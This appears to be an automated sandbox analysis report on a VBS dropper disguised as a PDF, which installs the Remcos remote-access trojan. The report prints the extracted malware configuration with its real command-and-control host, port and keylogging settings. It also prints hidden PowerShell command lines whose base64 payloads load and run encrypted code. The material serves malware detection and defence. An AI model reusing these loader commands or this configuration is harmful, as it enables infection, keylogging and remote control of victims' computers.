Windows Analysis Report
Hellas,pdf.vbs

AV Detection

Source: 15.2.powershell.exe.8da1288.5.raw.unpack

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["idonetire.duckdns.org:60735:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JSVSVI", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Source: Hellas,pdf.vbs	Virustotal: Detection: 33%			Perma Link
Source: Hellas,pdf.vbs	ReversingLabs: Detection: 22%

Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.2882266022.000000000C028000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2040616405.000000000ADA8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2550254218.000000000A8F8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1806892725.0000000002DDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1546112824.00000000077A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2303557593.0000000006DBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1549446860.0000000008710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2858524631.0000000008418000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1719709803.00000000072B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2839073220.0000000007DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1780758184.000000000ADE8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2433999584.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2365827222.0000000007CFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2080417610.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1944611268.000000000723A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Cryptography

Source: powershell.exe, 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_720f3318-2

Exploits

Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR

Spreading

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\			Jump to behavior

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49732 -> 37.120.208.37:60735
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49735 -> 37.120.208.37:60735
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49736 -> 37.120.208.37:60735
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49733 -> 37.120.208.37:60735
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49721 -> 37.120.208.37:60735
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49738 -> 37.120.208.37:60735
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49737 -> 37.120.208.37:60735
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49739 -> 37.120.208.37:60735

Source: Malware configuration extractor

URLs: idonetire.duckdns.org

Source: global traffic

TCP traffic: 37.120.208.37 ports 0,60735,3,5,6,7

Source: unknown

DNS query: name: idonetire.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.5:49721 -> 37.120.208.37:60735

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: idonetire.duckdns.org

Source: powershell.exe, 00000031.00000002.2917758631.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://.)
Source: powershell.exe, 00000015.00000002.1719709803.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2080417610.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000001F.00000002.2303557593.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microg
Source: powershell.exe, 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000015.00000002.1780758184.000000000ADED000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.2040616405.000000000ADAD000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000001F.00000002.2550254218.000000000A8FD000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000027.00000002.2882266022.000000000C02D000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000002C.00000002.2858524631.000000000841D000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 0000000F.00000002.1532865165.0000000005121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1670295072.0000000004A85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1809680380.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1959478672.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2094746047.0000000004B05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2274343065.0000000004855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2462516754.0000000004635000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1532865165.0000000005121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1670295072.0000000004A85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1809680380.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1959478672.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2094746047.0000000004B05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2274343065.0000000004855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2462516754.0000000004635000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Jump to behavior

Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR

E-Banking Fraud

Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.2882266022.000000000C028000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2040616405.000000000ADA8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2550254218.000000000A8F8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1806892725.0000000002DDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1546112824.00000000077A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2303557593.0000000006DBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1549446860.0000000008710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2858524631.0000000008418000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1719709803.00000000072B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2839073220.0000000007DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1780758184.000000000ADE8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2433999584.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2365827222.0000000007CFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2080417610.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1944611268.000000000723A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

Source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000F.00000002.1552419093.000000000A0BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001F.00000002.2512708434.0000000009DFA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000027.00000002.2774707860.000000000B043000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000015.00000002.1740439060.00000000098E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000002C.00000002.2858524631.000000000841D000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.2373508321.0000000008C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000027.00000002.2882266022.000000000C02D000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.1568471342.000000000A7A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001A.00000002.2040616405.000000000ADAD000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.1572745372.000000000AB3A000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001F.00000002.2550254218.000000000A8FD000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000015.00000002.1780758184.000000000ADED000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001A.00000002.1977944818.000000000914B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WordDoc.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Z